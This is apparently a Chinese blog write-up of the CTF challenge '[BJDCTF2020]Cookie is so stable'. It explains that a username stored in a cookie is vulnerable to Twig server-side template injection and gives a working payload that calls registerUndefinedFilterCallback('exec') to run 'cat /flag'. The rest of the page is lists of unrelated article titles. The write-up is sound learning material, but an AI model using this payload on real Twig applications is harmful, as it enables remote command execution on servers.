[BJDCTF2020]Cookie is so stable

  • 开发
  • 14

hint提示查看cookies 

flag.php页面我们先随便输入一个名字

 

输入后我们重新进一次flag.php,发现cookie里存储了刚刚登陆时输入的用户名,直接猜是ssti 

 尝试后根据ssti特征判断是twig模板

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 

 ​​​​​​​

这里貌似只能显示一行,ls显示不全,所以直接猜flag在根目录下了 

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-03-17 18:30:03       16 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-17 18:30:03       16 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-03-17 18:30:03       15 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-03-17 18:30:03       18 阅读

热门阅读

  2. 微服务的无状态、版本控制向后兼容、流量整型

    2024-03-17 18:30:03       16 阅读

  9. IBatis与MyBatis区别

    2024-03-17 18:30:03       18 阅读

  12. torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate XXX

    2024-03-17 18:30:03       13 阅读

  17. MongoDB聚合运算符:$expMovingAvg

    2024-03-17 18:30:03       14 阅读

  22. 【每日前端面经】2024-03-14

    2024-03-17 18:30:03       18 阅读

  23. Git中的换行符CRLF和LF问题

    2024-03-17 18:30:03       21 阅读